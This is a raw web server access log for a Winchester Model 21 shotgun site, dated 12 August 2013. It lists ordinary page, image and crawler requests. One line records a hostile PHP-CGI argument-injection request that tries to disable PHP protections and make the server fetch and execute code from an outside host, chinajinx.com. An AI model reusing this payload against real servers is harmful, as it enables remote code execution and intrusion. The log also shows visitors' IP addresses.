63.87.61.76 - - [12/Aug/2013:22:09:34 -0400] "GET /images/446_DSC_1422_1524COVER052306.jpg HTTP/1.1" 200 26539 "http://www.winchestermodel21.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
220.181.108.86 - - [12/Aug/2013:20:43:21 -0400] "GET /scripts/photoalbum.js HTTP/1.1" 200 62481 "http://www.winchestermodel21.com/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9) Gecko Minefield/3.0"
66.249.83.64 - - [12/Aug/2013:20:55:34 -0400] "GET / HTTP/1.1" 200 16143 "-" "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google (+https://developers.google.com/+/web/snippet/)"
66.249.83.64 - - [12/Aug/2013:20:55:34 -0400] "GET /favicon.ico HTTP/1.1" 404 575 "-" "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google (+https://developers.google.com/+/web/snippet/)"
67.211.200.121 - - [12/Aug/2013:04:12:05 -0400] "GET /robots.txt HTTP/1.0" 200 25 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 (support@google.com)"
63.87.61.76 - - [12/Aug/2013:22:08:59 -0400] "GET /scripts/template.css HTTP/1.1" 200 10951 "http://www.winchestermodel21.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
63.87.61.76 - - [12/Aug/2013:22:11:21 -0400] "GET /scripts/icwebsiteelement.css HTTP/1.1" 200 8132 "http://www.winchestermodel21.com/acquire.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
63.87.61.76 - - [12/Aug/2013:22:11:21 -0400] "GET /images/510_M21CoverPage111206PS72Enhance.jpg HTTP/1.1" 200 60991 "http://www.winchestermodel21.com/acquire.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
63.87.61.76 - - [12/Aug/2013:22:11:21 -0400] "GET /favicon.ico HTTP/1.1" 404 575 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
65.55.52.114 - - [12/Aug/2013:15:03:44 -0400] "GET /grades.html HTTP/1.1" 200 29320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
68.108.150.100 - - [12/Aug/2013:19:19:17 -0400] "GET /favicon.ico HTTP/1.1" 404 575 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)"
99.74.206.205 - - [12/Aug/2013:20:06:59 -0400] "GET / HTTP/1.1" 200 16143 "https://www.google.com/" "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
99.74.206.205 - - [12/Aug/2013:20:06:59 -0400] "GET /scripts/6custom.css HTTP/1.1" 200 2825 "http://www.winchestermodel21.com/" "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
99.74.206.205 - - [12/Aug/2013:20:06:59 -0400] "GET /images/446_DSC_1422_1524COVER052306.jpg HTTP/1.1" 200 26539 "http://www.winchestermodel21.com/" "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
166.137.119.49 - - [12/Aug/2013:11:46:02 -0400] "GET /scripts/template.css HTTP/1.1" 200 10951 "http://www.winchestermodel21.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_4 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B350 Safari/8536.25"
63.87.61.76 - - [12/Aug/2013:22:11:21 -0400] "GET /acquire.html HTTP/1.1" 200 14146 "http://www.winchestermodel21.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
63.87.61.76 - - [12/Aug/2013:22:11:21 -0400] "GET /scripts/8custom.css HTTP/1.1" 200 4524 "http://www.winchestermodel21.com/acquire.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
63.87.61.76 - - [12/Aug/2013:22:11:21 -0400] "GET /images/325_John_Olin_KingBuck_cover_Winchester_cat_1970_H6.jpg HTTP/1.1" 200 35909 "http://www.winchestermodel21.com/acquire.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
157.55.35.115 - - [12/Aug/2013:11:46:41 -0400] "GET /page7.html HTTP/1.1" 404 575 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.75.64 - - [12/Aug/2013:14:53:36 -0400] "GET /grades.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
63.87.61.76 - - [12/Aug/2013:22:11:50 -0400] "GET /highprice.html HTTP/1.1" 200 11889 "http://www.winchestermodel21.com/highlights.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
123.125.71.87 - - [12/Aug/2013:11:09:38 -0400] "GET /scripts/ic_globals_published.js HTTP/1.1" 200 566 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
65.55.52.114 - - [12/Aug/2013:16:11:15 -0400] "GET /images/W32251_Combined_M-21.pdf HTTP/1.1" 200 5607538 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
199.21.99.103 - - [12/Aug/2013:16:26:19 -0400] "GET / HTTP/1.1" 200 16143 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
71.176.202.198 - - [12/Aug/2013:17:25:13 -0400] "GET /images/171_M21W34008P1Grade2.jpg HTTP/1.1" 200 10780 "http://www.winchestermodel21.com/grades.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
71.176.202.198 - - [12/Aug/2013:17:25:15 -0400] "GET /favicon.ico HTTP/1.1" 404 575 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
95.108.248.29 - - [12/Aug/2013:14:17:41 -0400] "GET / HTTP/1.1" 200 16143 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
71.176.202.198 - - [12/Aug/2013:17:12:33 -0400] "GET /images/446_DSC_1422_1524COVER052306.jpg HTTP/1.1" 200 26539 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
65.55.52.114 - - [12/Aug/2013:07:48:42 -0400] "GET /images/Pigeon28_M-21_86Cat.pdf HTTP/1.1" 200 1744405 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
99.74.206.205 - - [12/Aug/2013:20:06:59 -0400] "GET /scripts/photoalbum.js HTTP/1.1" 200 62481 "http://www.winchestermodel21.com/" "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
99.74.206.205 - - [12/Aug/2013:20:07:01 -0400] "GET /scripts/print.css HTTP/1.1" 200 11304 "http://www.winchestermodel21.com/" "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
99.74.206.205 - - [12/Aug/2013:20:07:01 -0400] "GET /favicon.ico HTTP/1.1" 404 575 "-" "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
67.211.200.121 - - [12/Aug/2013:04:12:05 -0400] "GET /scripts/template.css HTTP/1.0" 200 10951 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 support@google.com"
63.87.61.76 - - [12/Aug/2013:22:08:56 -0400] "GET / HTTP/1.1" 200 16143 "http://www.google.com/url?sa=t&rct=j&q=winchester%20model%2021&source=web&cd=7&ved=0CEQQFjAG&url=http%3A%2F%2Fwww.winchestermodel21.com%2F&ei=aZMJUve1JO_d4AOxxoDQAw&usg=AFQjCNGbjZGHyLh8DxQxjYEwbnmeNygIGw" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
63.87.61.76 - - [12/Aug/2013:22:08:59 -0400] "GET /scripts/website.css HTTP/1.1" 200 1917 "http://www.winchestermodel21.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
63.87.61.76 - - [12/Aug/2013:22:12:03 -0400] "GET /email.html HTTP/1.1" 200 13700 "http://www.winchestermodel21.com/highprice.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
63.87.61.76 - - [12/Aug/2013:22:12:12 -0400] "GET /scripts/1custom.css HTTP/1.1" 200 5537 "http://www.winchestermodel21.com/gauges.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
63.87.61.76 - - [12/Aug/2013:22:12:14 -0400] "GET /images/171_W34001_GA_28.jpg HTTP/1.1" 200 14017 "http://www.winchestermodel21.com/gauges.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
63.87.61.76 - - [12/Aug/2013:22:12:14 -0400] "GET /images/171_W34005P1Pigeon28.jpg HTTP/1.1" 200 6943 "http://www.winchestermodel21.com/gauges.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
200.136.7.98 - - [12/Aug/2013:16:43:39 -0400] "GET /phppath/php?-d+allow_url_include%3d1+-d+safe_mode%3d0+-d+suhosin.simulation%3d1+-d+disable_functions%3d''+-d+open_basedir%3dnone+-d+auto_prepend_file%3dhttp://chinajinx.com/1.txt+-n HTTP/1.1" 404 575 "-" "MSIE9"
71.176.202.198 - - [12/Aug/2013:17:25:13 -0400] "GET /grades.html HTTP/1.1" 200 29320 "http://www.winchestermodel21.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
71.176.202.198 - - [12/Aug/2013:17:25:13 -0400] "GET /images/171_W34010P1Grade4.jpg HTTP/1.1" 200 10444 "http://www.winchestermodel21.com/grades.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
71.176.202.198 - - [12/Aug/2013:17:25:13 -0400] "GET /images/171_W34000P1GA410.jpg HTTP/1.1" 200 7276 "http://www.winchestermodel21.com/grades.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
69.64.58.188 - - [12/Aug/2013:18:02:02 -0400] "GET / HTTP/1.1" 206 5001 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
68.108.150.100 - - [12/Aug/2013:19:19:09 -0400] "GET /favicon.ico HTTP/1.1" 404 575 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)"
220.181.108.95 - - [12/Aug/2013:22:11:01 -0400] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
63.87.61.76 - - [12/Aug/2013:22:12:14 -0400] "GET /images/171_Grand_American20.jpg HTTP/1.1" 200 10575 "http://www.winchestermodel21.com/gauges.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
180.153.236.66 - - [12/Aug/2013:06:36:24 -0400] "GET / HTTP/1.1" 200 16143 "http://www.winchestermodel21.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.0.11) Firefox/1.5.0.11; 360Spider"
220.181.89.190 - - [12/Aug/2013:07:24:10 -0400] "GET / HTTP/1.1" 200 16143 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
166.137.119.49 - - [12/Aug/2013:11:46:02 -0400] "GET /scripts/user.js HTTP/1.1" 200 23762 "http://www.winchestermodel21.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_4 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B350 Safari/8536.25"
220.181.89.190 - - [12/Aug/2013:06:37:37 -0400] "GET /robots.txt HTTP/1.1" 200 25 "-" "Sogou web spider/4.0"
192.96.204.42 - - [12/Aug/2013:22:26:07 -0400] "GET / HTTP/1.1" 200 16143 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)"
72.23.74.73 - - [12/Aug/2013:00:16:30 -0400] "GET /scripts/website.css HTTP/1.1" 200 1917 "http://www.winchestermodel21.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B329 Safari/8536.25"
72.23.74.73 - - [12/Aug/2013:00:16:30 -0400] "GET /images/446_DSC_1422_1524COVER052306.jpg HTTP/1.1" 200 26539 "http://www.winchestermodel21.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B329 Safari/8536.25"
72.23.74.73 - - [12/Aug/2013:00:16:30 -0400] "GET /images/0.jpg HTTP/1.1" 200 302 "http://www.winchestermodel21.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B329 Safari/8536.25"
72.23.74.73 - - [12/Aug/2013:00:16:30 -0400] "GET /scripts/print.css HTTP/1.1" 200 11304 "http://www.winchestermodel21.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B329 Safari/8536.25"
199.21.99.103 - - [12/Aug/2013:14:17:38 -0400] "GET /robots.txt HTTP/1.1" 200 25 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
220.181.108.117 - - [12/Aug/2013:06:01:35 -0400] "GET /scripts/6custom.css HTTP/1.1" 200 2825 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
68.108.150.100 - - [12/Aug/2013:19:19:08 -0400] "GET /scripts/ic_globals_published.js HTTP/1.1" 200 566 "http://winchestermodel21.com/" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"
68.108.150.100 - - [12/Aug/2013:19:19:08 -0400] "GET /scripts/print.css HTTP/1.1" 200 11304 "http://winchestermodel21.com/" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"
65.55.52.114 - - [12/Aug/2013:11:10:24 -0400] "GET /images/SmallboreSetPressReleaseMAR2013.pdf HTTP/1.1" 200 1192125 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.52.114 - - [12/Aug/2013:07:45:15 -0400] "GET /robots.txt HTTP/1.1" 200 25 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
63.87.61.76 - - [12/Aug/2013:22:12:14 -0400] "GET /images/171_Grand_American_16.jpg HTTP/1.1" 200 11047 "http://www.winchestermodel21.com/gauges.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
63.87.61.76 - - [12/Aug/2013:22:12:14 -0400] "GET /images/171_Grand_American_12_W28514.jpg HTTP/1.1" 200 15664 "http://www.winchestermodel21.com/gauges.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
71.176.202.198 - - [12/Aug/2013:17:25:13 -0400] "GET /images/171_W34011P1Grade5.jpg HTTP/1.1" 200 11764 "http://www.winchestermodel21.com/grades.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
72.172.61.193 - - [12/Aug/2013:10:57:52 -0400] "GET /images/446_DSC_1422_1524COVER052306.jpg HTTP/1.1" 200 26539 "-" "rarely used"
71.176.202.198 - - [12/Aug/2013:17:25:13 -0400] "GET /images/171_M21W34007Grade1P1.jpg HTTP/1.1" 200 12498 "http://www.winchestermodel21.com/grades.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
68.108.150.100 - - [12/Aug/2013:19:19:08 -0400] "GET /scripts/photoalbum.js HTTP/1.1" 200 62481 "http://winchestermodel21.com/" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"
68.108.150.100 - - [12/Aug/2013:19:19:08 -0400] "GET /images/0.jpg HTTP/1.1" 200 302 "http://winchestermodel21.com/" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"
174.229.0.245 - - [12/Aug/2013:13:11:38 -0400] "GET /images/446_DSC_1422_1524COVER052306.jpg HTTP/1.1" 200 26539 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B329 Safari/8536.25"
63.87.61.76 - - [12/Aug/2013:22:09:35 -0400] "GET /favicon.ico HTTP/1.1" 404 575 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
65.55.52.114 - - [12/Aug/2013:16:09:39 -0400] "GET /robots.txt HTTP/1.1" 200 25 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
72.23.74.73 - - [12/Aug/2013:00:16:27 -0400] "GET /scripts/ic_globals_published.js HTTP/1.1" 200 566 "http://www.winchestermodel21.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B329 Safari/8536.25"
65.55.52.114 - - [12/Aug/2013:11:09:44 -0400] "GET /robots.txt HTTP/1.1" 200 25 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
166.137.119.49 - - [12/Aug/2013:11:46:02 -0400] "GET / HTTP/1.1" 200 16143 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_4 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B350 Safari/8536.25"
166.137.119.49 - - [12/Aug/2013:11:46:03 -0400] "GET /images/446_DSC_1422_1524COVER052306.jpg HTTP/1.1" 200 26539 "http://www.winchestermodel21.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_4 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B350 Safari/8536.25"
166.137.119.49 - - [12/Aug/2013:11:46:04 -0400] "GET /scripts/print.css HTTP/1.1" 200 11304 "http://www.winchestermodel21.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_4 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B350 Safari/8536.25"
71.176.202.198 - - [12/Aug/2013:17:24:58 -0400] "GET /scripts/6custom.css HTTP/1.1" 200 2825 "http://www.winchestermodel21.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
71.176.202.198 - - [12/Aug/2013:17:25:26 -0400] "GET /favicon.ico HTTP/1.1" 404 575 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
65.55.52.114 - - [12/Aug/2013:15:02:46 -0400] "GET /robots.txt HTTP/1.1" 200 25 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
63.87.61.76 - - [12/Aug/2013:22:11:35 -0400] "GET /highlights.html HTTP/1.1" 200 13043 "http://www.winchestermodel21.com/acquire.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
63.87.61.76 - - [12/Aug/2013:22:11:35 -0400] "GET /scripts/12custom.css HTTP/1.1" 200 2152 "http://www.winchestermodel21.com/highlights.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
157.55.35.115 - - [12/Aug/2013:18:35:28 -0400] "GET /robots.txt HTTP/1.1" 200 25 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
199.21.99.103 - - [12/Aug/2013:02:04:13 -0400] "GET / HTTP/1.1" 200 16143 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
166.137.119.49 - - [12/Aug/2013:11:46:02 -0400] "GET /scripts/photoalbum.js HTTP/1.1" 200 62481 "http://www.winchestermodel21.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_4 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B350 Safari/8536.25"
63.87.61.76 - - [12/Aug/2013:22:08:59 -0400] "GET /scripts/print.css HTTP/1.1" 200 11304 "http://www.winchestermodel21.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
63.87.61.76 - - [12/Aug/2013:22:08:59 -0400] "GET /scripts/user.js HTTP/1.1" 200 23762 "http://www.winchestermodel21.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
63.87.61.76 - - [12/Aug/2013:22:12:14 -0400] "GET /images/171_Pigeon410P1.jpg HTTP/1.1" 200 7850 "http://www.winchestermodel21.com/gauges.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
71.176.202.198 - - [12/Aug/2013:17:24:58 -0400] "GET /scripts/template.css HTTP/1.1" 200 10951 "http://www.winchestermodel21.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
71.176.202.198 - - [12/Aug/2013:17:24:58 -0400] "GET /scripts/icwebsiteelement.css HTTP/1.1" 200 8132 "http://www.winchestermodel21.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
72.23.74.73 - - [12/Aug/2013:00:16:26 -0400] "GET / HTTP/1.1" 200 16143 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B329 Safari/8536.25"
72.23.74.73 - - [12/Aug/2013:00:16:27 -0400] "GET /scripts/6custom.css HTTP/1.1" 200 2825 "http://www.winchestermodel21.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B329 Safari/8536.25"
